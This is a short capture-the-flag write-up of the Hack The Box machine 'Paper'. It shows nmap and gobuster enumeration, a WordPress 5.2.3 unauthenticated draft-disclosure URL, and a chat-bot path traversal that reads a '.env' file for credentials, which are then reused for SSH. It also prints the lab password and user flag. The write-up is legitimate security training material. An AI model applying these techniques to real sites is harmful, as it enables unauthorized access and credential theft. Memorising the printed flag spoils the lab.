#+TITLE: HTB - Paper
#+AUTHOR: Andrea Pepe
#+DATE: 13 April 2022

* Enumeration
** nmap
*** $ nmap -sV -sC paper
#+BEGIN_EXAMPLE
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-13 19:45 CEST
Nmap scan report for paper (10.10.11.143)
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1
#+END_EXAMPLE

Le porte TCP aperte sono ~ssh~, ~http (80)~ con un server Apache 2.4.37
e la porta ~openssl tcp 443~. Per quest'ultima notare che viene evidenziato
nel campo **http_methods** un metodo potenzialmente rischioso (TRACE).

** gobuster
*** $ gobuster vhost -w ~/Scrivania/gitFolder/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://paper     
#+BEGIN_EXAMPLE
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://paper
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /home/andrea/Scrivania/gitFolder/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/04/13 21:47:53 Starting gobuster in VHOST enumeration mode
===============================================================
Found: office.paper (Status: 200) [Size: 23705]
#+END_EXAMPLE

Abbiamo trovato il VHost **office.paper** e lo aggiungiamo a ~/etc/hosts~.
** Web server
Effettivamente riusciamo ad accedere a ~http://office.paper/index.php~ ed è
un sito tipo un blog. Notiamo che ci sono messaggi interessanti riguardanti 
l'inserimento di **secrets** in **drafts** passati. Inoltre, come è facile evincere
dalla pagina web, il sito è realizzato con Wordpress.
Cercando informazioni su internet, si trova una vulnerabilità per Wordpress v <= 5.2.3
(https://wpscan.com/vulnerability/9909) in cui è possibile un accesso anautenticato a posts privati/drafts.
Utilizzando il plugin per Firefox ~Wappalyzer~, si vede che la versione di Wordpress usata
per il sito è esattamente 5.2.3, dunque soffre della vulnerabilità appena descritta.
La exploitiamo inserendo il seguente URL:
#+BEGIN_EXAMPLE
http://office.paper/index.php?static=1
#+END_EXAMPLE

Otteniamo sulla pagina web il seguente output:
#+BEGIN_EXAMPLE
test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

#+END_EXAMPLE

Dunque, possiamo accedere al seguente URL http://chat.office.paper/register/8qozr226AhkCHZdyY.
** Chat server
Interagendo con un Bot, possiamo rubare le sue credenziali per chat.office.paper, facendogli fare
un cat di un file in **../hubot/.env**, ottenendo

recyclops:Queenofblad3s!23

Tuttavia, abbiamo visto che l'utente proprietario delle cartelle del bot sulla macchina era **dwight**.

Quindi, proviamo ad accedere tramite ~ssh~ con credenziali **dwight:Queenofblad3s!23**

** ssh
And Yeees, we got a shell as dwight!!!


* Privilege Escalation
** dwight
dwight: Queenofblad3s!23
*** user flag
db72331f12b77edee13958c26cec1bae

